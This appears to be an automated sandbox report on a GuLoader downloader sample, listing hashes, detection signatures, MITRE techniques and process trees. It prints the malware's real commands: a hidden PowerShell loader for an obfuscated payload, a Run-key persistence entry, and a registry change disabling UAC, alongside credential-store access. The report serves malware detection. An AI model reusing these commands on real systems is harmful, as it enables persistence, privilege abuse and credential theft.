Overview
overview
10Static
static
3d3da22560f...06.exe
windows7-x64
10d3da22560f...06.exe
windows10-2004-x64
8$PLUGINSDI...sh.dll
windows7-x64
3$PLUGINSDI...sh.dll
windows10-2004-x64
3$PLUGINSDI...ge.dll
windows7-x64
1$PLUGINSDI...ge.dll
windows10-2004-x64
1$PLUGINSDI...fo.dll
windows7-x64
3$PLUGINSDI...fo.dll
windows10-2004-x64
3$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
28-06-2024 01:51
Static task
static1
Behavioral task
behavioral1
Sample
d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/AdvSplash.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/AdvSplash.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/BgImage.dll
Resource
win7-20240508-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/BgImage.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral7
Sample
$PLUGINSDIR/UserInfo.dll
Resource
win7-20240611-en
Behavioral task
behavioral8
Sample
$PLUGINSDIR/UserInfo.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20231129-en
Behavioral task
behavioral10
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240508-en
General
-
Target
d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe
-
Size
655KB
-
MD5
76583ad77f92f7c21402dcf6e7a4b613
-
SHA1
8b20685d00b9c729356f8b3d371da03b326e4a80
-
SHA256
d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306
-
SHA512
79c4a2621da0707c22a79b472a3a90f34debb6a9e1266ccf6826886646c9a1e495535ff800fccc08ac35531cce4e84f98b5b68afdf25e040bdc3e1720109fced
-
SSDEEP
12288:zsB4GOFNFqtVK+NvRHTLii5BpGH1uF5BhZeizW0Ij3:I4GOnFqrnj5BpkO5/ZjKj3
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Detects executables built or packed with MPress PE compressor 12 IoCs
Processes:
resource yara_rule behavioral1/memory/1196-193-0x0000000000400000-0x0000000000478000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2312-200-0x0000000000400000-0x0000000000424000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2312-203-0x0000000000400000-0x0000000000424000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/984-195-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/2312-202-0x0000000000400000-0x0000000000424000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/984-201-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/1196-198-0x0000000000400000-0x0000000000478000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/984-197-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/1196-196-0x0000000000400000-0x0000000000478000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/1940-211-0x0000000010000000-0x0000000010019000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/1940-215-0x0000000010000000-0x0000000010019000-memory.dmp INDICATOR_EXE_Packed_MPress behavioral1/memory/1940-214-0x0000000010000000-0x0000000010019000-memory.dmp INDICATOR_EXE_Packed_MPress -
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 1 IoCs
Processes:
resource yara_rule behavioral1/memory/984-201-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store -
Detects executables referencing many email and collaboration clients. Observed in information stealers 1 IoCs
Processes:
resource yara_rule behavioral1/memory/984-201-0x0000000000400000-0x0000000000462000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral1/memory/984-201-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral1/memory/1196-198-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 3 IoCs
Processes:
resource yara_rule behavioral1/memory/2312-203-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral1/memory/984-201-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/1196-198-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
Blocklisted process makes network request 10 IoCs
Processes:
powershell.exeflow pid process 5 1940 powershell.exe 7 1940 powershell.exe 9 1940 powershell.exe 11 1940 powershell.exe 13 1940 powershell.exe 15 1940 powershell.exe 17 1940 powershell.exe 18 1940 powershell.exe 19 1940 powershell.exe 20 1940 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Loads dropped DLL 4 IoCs
Processes:
d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exepid process 2064 d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe 2064 d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe 2064 d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe 2064 d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Run\Solosanges = "%Xenoglossia154% -windowstyle minimized $prelocalizations=(Get-ItemProperty -Path 'HKCU:\\Vivans\\').rearrangeret;%Xenoglossia154% ($prelocalizations)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
powershell.exepid process 1940 powershell.exe 1940 powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
powershell.exepid process 1940 powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exedescription pid process target process PID 1940 set thread context of 1196 1940 powershell.exe powershell.exe PID 1940 set thread context of 984 1940 powershell.exe powershell.exe PID 1940 set thread context of 2312 1940 powershell.exe powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exedescription ioc process File opened for modification C:\Windows\Fonts\anorakkerne.ini d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exepid process 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe 1196 powershell.exe 1196 powershell.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
powershell.exepid process 1940 powershell.exe 1940 powershell.exe 1940 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1940 powershell.exe Token: SeDebugPrivilege 2312 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 1940 powershell.exe -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exepowershell.execmd.execmd.exedescription pid process target process PID 2064 wrote to memory of 1940 2064 d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe powershell.exe PID 2064 wrote to memory of 1940 2064 d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe powershell.exe PID 2064 wrote to memory of 1940 2064 d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe powershell.exe PID 2064 wrote to memory of 1940 2064 d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe powershell.exe PID 1940 wrote to memory of 2840 1940 powershell.exe cmd.exe PID 1940 wrote to memory of 2840 1940 powershell.exe cmd.exe PID 1940 wrote to memory of 2840 1940 powershell.exe cmd.exe PID 1940 wrote to memory of 2840 1940 powershell.exe cmd.exe PID 2840 wrote to memory of 2308 2840 cmd.exe reg.exe PID 2840 wrote to memory of 2308 2840 cmd.exe reg.exe PID 2840 wrote to memory of 2308 2840 cmd.exe reg.exe PID 2840 wrote to memory of 2308 2840 cmd.exe reg.exe PID 1940 wrote to memory of 3036 1940 powershell.exe cmd.exe PID 1940 wrote to memory of 3036 1940 powershell.exe cmd.exe PID 1940 wrote to memory of 3036 1940 powershell.exe cmd.exe PID 1940 wrote to memory of 3036 1940 powershell.exe cmd.exe PID 3036 wrote to memory of 2208 3036 cmd.exe reg.exe PID 3036 wrote to memory of 2208 3036 cmd.exe reg.exe PID 3036 wrote to memory of 2208 3036 cmd.exe reg.exe PID 3036 wrote to memory of 2208 3036 cmd.exe reg.exe PID 1940 wrote to memory of 1196 1940 powershell.exe powershell.exe PID 1940 wrote to memory of 1196 1940 powershell.exe powershell.exe PID 1940 wrote to memory of 1196 1940 powershell.exe powershell.exe PID 1940 wrote to memory of 1196 1940 powershell.exe powershell.exe PID 1940 wrote to memory of 1196 1940 powershell.exe powershell.exe PID 1940 wrote to memory of 984 1940 powershell.exe powershell.exe PID 1940 wrote to memory of 984 1940 powershell.exe powershell.exe PID 1940 wrote to memory of 984 1940 powershell.exe powershell.exe PID 1940 wrote to memory of 984 1940 powershell.exe powershell.exe PID 1940 wrote to memory of 984 1940 powershell.exe powershell.exe PID 1940 wrote to memory of 2312 1940 powershell.exe powershell.exe PID 1940 wrote to memory of 2312 1940 powershell.exe powershell.exe PID 1940 wrote to memory of 2312 1940 powershell.exe powershell.exe PID 1940 wrote to memory of 2312 1940 powershell.exe powershell.exe PID 1940 wrote to memory of 2312 1940 powershell.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe"C:\Users\Admin\AppData\Local\Temp\d3da22560f0fcc2db9c1dabf88266dbe8ddaeee9f9be11fef8812c0879e5b306.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Ammet=Get-Content 'C:\Users\Admin\AppData\Roaming\Odontiasis\Goatishness\Bygningsbestanddels\Kork.Eks';$hesperidate=$Ammet.SubString(3360,3);.$hesperidate($Ammet)"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Solosanges" /t REG_EXPAND_SZ /d "%Xenoglossia154% -windowstyle minimized $prelocalizations=(Get-ItemProperty -Path 'HKCU:\Vivans\').rearrangeret;%Xenoglossia154% ($prelocalizations)"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Solosanges" /t REG_EXPAND_SZ /d "%Xenoglossia154% -windowstyle minimized $prelocalizations=(Get-ItemProperty -Path 'HKCU:\Vivans\').rearrangeret;%Xenoglossia154% ($prelocalizations)"4⤵
- Adds Run key to start application
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\iwlibxgvgquqtmko"3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\kyrbcprxtymvwayasye"3⤵
- Accesses Microsoft Outlook accounts
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\uswldicqhgeigguekjrfjj"3⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\remcos\logs.datFilesize
130B
MD5014bd71f3bb0f3482711ef551afd44a0
SHA16bc4a87773f15c41f9de0dfc413a3c62127d4201
SHA2560e7470b223f39a4cd3610b27224ce9a0bbadaf09c1262c760bb575e01ac33338
SHA512d6a9ee1bb0df132a941dab613b89b86400289c96aefb8acef4b411f4c767e35c6e1a76027f9267dc8f40054007c06f17bf0179a71d72b7912a3b903f60fec97a
-
C:\Users\Admin\AppData\Local\Temp\iwlibxgvgquqtmkoFilesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Roaming\Odontiasis\Goatishness\Bygningsbestanddels\Kork.EksFilesize
69KB
MD5c81a6714a02500d34518c574f9d4b01f
SHA1e8f5d63579d995c2e80aa96c2fa51b3502739792
SHA256134b2aeb304ebbbcd2cf8b1eff5b54bd122795ea5eaf70c939ac27fb979459f2
SHA51290fe3078eb67b5cf39605672f130feeb4e348042ee8792a8e366332d12b3c1c5950655e10b7d6112d8a96b98760fe0a6f5ffb217bb932cbb66494c1a1c6e35c4
-
C:\Users\Admin\AppData\Roaming\Odontiasis\Goatishness\Bygningsbestanddels\Pitilessness.Lge211Filesize
337KB
MD584cb54267314cdae695bbdbbdd55740a
SHA15bf6c405ff05211a5b5455818380449baecac63b
SHA25640ac4dd2689ff258481e2881bfb93508828a98f3236b09393f7fdbeafd461805
SHA51249b46e4e08c720207b968b02b301881f8a7140b1afaf3e5adc05119634a69acabb81097a17daed421c96ef14c9ec4919b718d7d768099d6a2bbf47497f67fa4b
-
C:\Users\Admin\Pictures\slukningen.lnkFilesize
976B
MD50bf96795786c3ca8aa0539ca8bd3fb98
SHA1545eaf23d31e9c442522205cc3cacc9992ee92d1
SHA256b551f5204e096a26d749b7eece944d5f7662bc907223e2b58e9aa4aa53bc1e01
SHA512202f0fbb9ca5c3535477578d3ccebc66a00bf14b47633242409eac82246697adb78065e9626c5eebab1ddb5d6304cdfda989e9724b3696be26c230ccd6a0f49b
-
\Users\Admin\AppData\Local\Temp\nsj781E.tmp\AdvSplash.dllFilesize
6KB
MD56def2cf3daf850acdc1a3e7340a439c4
SHA195d0d26f60cd5af697502cd5e53a54913ab188fb
SHA2563ec3cf21a99ab0533ec2c451df3b5542733f70b972089d5c321ad7ae3b87d175
SHA51216b1cf4783284d4a1282c569f5c416c713b4b339efcd4d3948bdf7da2194c597bd732d07ba9fabafcab323ba8c8da68845d4435ab9d1916b1810087ee1f5c413
-
\Users\Admin\AppData\Local\Temp\nsj781E.tmp\BgImage.dllFilesize
7KB
MD52bb17d45e5ad92053ce1e500408dd8a9
SHA1f5d3a7ee6e28df532e9ce33976c92ff30a5665e4
SHA25671ce676703dad028e4083e6b960b1ed89885877079d46d5021506eaa6d99db53
SHA512efdcb476b9b9b5691fe6b9cd77ecbe48d50c6683da01fd51c6b428cc262528fb3dcd295abe28718321b2307b0e032fcb599588f1eb00a93fd9e6a1f7b322b41f
-
\Users\Admin\AppData\Local\Temp\nsj781E.tmp\UserInfo.dllFilesize
4KB
MD58ef0e4eb7c89cdd2b552de746f5e2a53
SHA1820f681e7cec409a02b194a487d1c8af1038acf0
SHA25641293b9f6588e0fbdc8fcf2a9bd8e2b244cd5ff038fc13033378da337219c9dc
SHA512a68533e8a19637d0d44219549b24baba0dc4824424842f125600fda3edcafc4bb6bb340d57a00815f262d82373b440d58d6e4e5b2ceb29bb3f6bc4cbde66c3c5
-
\Users\Admin\AppData\Local\Temp\nsj781E.tmp\nsExec.dllFilesize
6KB
MD5c129bc26a26be6f5816a03520bb37833
SHA118100042155f948301701744b131c516bf26ddb8
SHA256d3694fa0503158194129d113fcc1c83177ff5a5f93d898ce0bcfe9ce12f06bf4
SHA512dbe79859c41e00a6e951cee889e7f0de29a712792fb531662285a2d6e384884518c7d5d983894c185b3d31d81213d2477cf4576b0114d352b759fe07a1704e63
-
memory/984-197-0x0000000000400000-0x0000000000462000-memory.dmpFilesize
392KB
-
memory/984-201-0x0000000000400000-0x0000000000462000-memory.dmpFilesize
392KB
-
memory/984-195-0x0000000000400000-0x0000000000462000-memory.dmpFilesize
392KB
-
memory/1196-196-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/1196-198-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/1196-193-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/1196-192-0x000000007EFDE000-0x000000007EFDF000-memory.dmpFilesize
4KB
-
memory/1940-190-0x0000000006200000-0x000000000A00D000-memory.dmpFilesize
62.1MB
-
memory/1940-161-0x0000000074540000-0x0000000074AEB000-memory.dmpFilesize
5.7MB
-
memory/1940-165-0x0000000074540000-0x0000000074AEB000-memory.dmpFilesize
5.7MB
-
memory/1940-155-0x0000000074541000-0x0000000074542000-memory.dmpFilesize
4KB
-
memory/1940-214-0x0000000010000000-0x0000000010019000-memory.dmpFilesize
100KB
-
memory/1940-164-0x0000000074540000-0x0000000074AEB000-memory.dmpFilesize
5.7MB
-
memory/1940-215-0x0000000010000000-0x0000000010019000-memory.dmpFilesize
100KB
-
memory/1940-162-0x0000000074540000-0x0000000074AEB000-memory.dmpFilesize
5.7MB
-
memory/1940-211-0x0000000010000000-0x0000000010019000-memory.dmpFilesize
100KB
-
memory/1940-166-0x0000000006200000-0x000000000A00D000-memory.dmpFilesize
62.1MB
-
memory/1940-158-0x0000000074540000-0x0000000074AEB000-memory.dmpFilesize
5.7MB
-
memory/1940-156-0x0000000074540000-0x0000000074AEB000-memory.dmpFilesize
5.7MB
-
memory/1940-157-0x0000000074540000-0x0000000074AEB000-memory.dmpFilesize
5.7MB
-
memory/2312-199-0x000000007EFDE000-0x000000007EFDF000-memory.dmpFilesize
4KB
-
memory/2312-202-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/2312-203-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/2312-200-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB